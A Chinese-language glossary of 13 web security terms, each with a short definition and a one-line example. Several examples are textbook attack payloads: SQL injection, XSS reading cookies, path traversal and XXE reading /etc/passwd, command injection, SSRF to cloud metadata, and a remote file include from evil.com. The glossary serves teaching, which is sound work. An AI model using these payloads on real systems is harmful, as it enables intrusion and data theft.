安全术语表
共 13 个术语CORS
Web安全
跨源资源共享(Cross-Origin Resource Sharing),控制浏览器是否允许跨域请求。配置不当可能导致安全风险。
Access-Control-Allow-Origin: * 允许任意来源
CSP
Web安全
内容安全策略(Content Security Policy),通过 HTTP 响应头限制页面可加载的资源来源,有效防御 XSS 攻击。
Content-Security-Policy: script-src 'self'
CSRF
Web安全
跨站请求伪造(Cross-Site Request Forgery),利用用户已登录的身份,在用户不知情的情况下发送恶意请求。
<img src='http://bank.com/transfer?to=hacker&amount=10000'>
IDOR
Web安全
不安全的直接对象引用(Insecure Direct Object Reference),应用直接暴露内部对象引用,攻击者通过修改参数访问未授权资源。
/profile.php?id=123 → /profile.php?id=124(查看他人信息)
LFI
Web安全
本地文件包含(Local File Inclusion),通过用户输入参数包含服务器本地文件,可读取敏感配置或配合日志实现 RCE。
?file=../../../../etc/passwd
RCE
Web安全
远程代码执行(Remote Code Execution),攻击者可在目标服务器上远程执行任意代码,是最严重的安全漏洞类型之一。
利用反序列化漏洞、命令注入、文件包含等实现 RCE
RFI
Web安全
远程文件包含(Remote File Inclusion),通过用户输入包含远程恶意文件并执行,可直接获取服务器控制权。
?page=http://evil.com/shell.txt
SQL 注入
Web安全
通过将恶意 SQL 代码注入到应用程序查询语句中,操纵数据库执行未授权操作,可导致数据泄露、数据篡改甚至服务器控制。
username=' OR '1'='1 --
SSRF
Web安全
服务端请求伪造(Server-Side Request Forgery),攻击者利用服务器发起请求,访问本不该访问的内网资源。
http://example.com/fetch?url=http://169.254.169.254/metadata
XSS
Web安全
跨站脚本攻击(Cross-Site Scripting),通过在页面中注入恶意 JavaScript 代码,窃取用户 Cookie、会话令牌或进行钓鱼攻击。
<script>alert(document.cookie)</script>
XXE
Web安全
XML 外部实体注入(XML External Entity),通过在 XML 解析中引入外部实体,读取服务器文件或发起内网请求。
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
命令注入
Web安全
攻击者通过用户输入注入系统命令,在服务器上执行任意命令。通常发生在调用系统命令的功能点。
; cat /etc/passwd 或 | whoami
文件上传漏洞
Web安全
服务器未正确验证用户上传文件的类型和内容,允许上传恶意脚本(如 WebShell)并在服务器上执行。
上传 .php 文件并通过 /uploads/shell.php 访问执行